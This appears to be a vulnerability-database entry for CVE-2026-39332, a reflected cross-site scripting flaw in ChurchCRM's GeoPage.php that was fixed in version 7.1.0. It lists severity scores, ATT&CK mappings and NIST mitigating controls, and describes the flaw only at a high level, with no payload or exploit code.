CVE-2026-39332
Published: 07 April 2026
Summary
CVE-2026-39332 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Churchcrm Churchcrm. Its CVSS base score is 8.7 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 11.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Directly mitigates the reflected XSS vulnerability by requiring timely identification, testing, and installation of the patch released in ChurchCRM version 7.1.0.
Prevents execution of injected JavaScript in GeoPage.php outputs by filtering and encoding reflected user inputs to block XSS payloads like autofocus scripts.
Validates crafted form inputs to GeoPage.php, rejecting malicious JavaScript before reflection and potential execution in victim browsers.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Reflected XSS enables injection and automatic execution of arbitrary JavaScript in the victim's browser, directly facilitating browser session hijacking (T1185) and theft of web session cookies (T1539) for account compromise.
NVD Description
ChurchCRM is an open-source church management system. Prior to 7.1.0, a reflected Cross-Site Scripting (XSS) vulnerability in GeoPage.php allows any authenticated user to inject arbitrary JavaScript into the browser of another authenticated user. Because the payload fires automatically via autofocus…
more
with no user interaction required, an attacker can steal session cookies and fully take over any victim account, including administrator accounts, by tricking them into submitting a crafted form. This vulnerability is fixed in 7.1.0.
Deeper analysisAI
ChurchCRM, an open-source church management system, contains a reflected Cross-Site Scripting (XSS) vulnerability designated as CVE-2026-39332 in its GeoPage.php component prior to version 7.1.0. This issue, linked to CWE-79 and rated 8.7 on the CVSS v3.1 scale (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N), enables the injection of arbitrary JavaScript code into the browsers of other users.
Any authenticated user can exploit this vulnerability against another authenticated user by crafting a malicious form submission. The injected payload executes automatically via the autofocus attribute without requiring additional user interaction, allowing the attacker to steal session cookies and fully compromise the victim's account, including administrator privileges.
The vulnerability is addressed in ChurchCRM version 7.1.0. Additional details on the issue and remediation are available in the GitHub security advisory at https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hc6g-h48v-wqvq.
Details
- CWE(s)